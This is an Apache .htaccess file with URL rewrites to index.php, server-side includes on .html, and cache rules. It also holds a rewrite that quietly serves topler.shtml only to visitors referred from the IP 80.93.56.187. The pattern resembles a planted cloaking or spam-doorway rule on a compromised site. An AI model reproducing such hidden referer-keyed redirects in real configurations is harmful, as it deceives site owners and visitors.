Options All -Indexes
ErrorDocument 404 /404.php
FileETag MTime Size
AddOutputFilter INCLUDES .shtml
AddOutputFilter INCLUDES .html

<IfModule mod_rewrite.c>
RewriteEngine On
RewriteRule ^sitemap\.xml$ index.php [L]
RewriteRule ^(.*)(\.html|\.htm)$ index.php [L]
RewriteRule ^(.*)(\.rss|\.atom|\.txt)$ index.php [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule ^(.*)/?$ index.php [L]
RewriteCond %{HTTP_REFERER} /80\.93\.56\.187/
RewriteRule .* topler.shtml [L]
</IfModule>

<IfModule mod_expires.c>
	ExpiresActive on
	ExpiresByType image/gif "access plus 1 months"
	ExpiresByType image/jpeg "access plus 1 months"
	ExpiresByType image/png "access plus 1 months"
	ExpiresByType text/css "access plus 1 months"
	ExpiresByType application/x-javascript "access plus 1 months"
</IfModule>

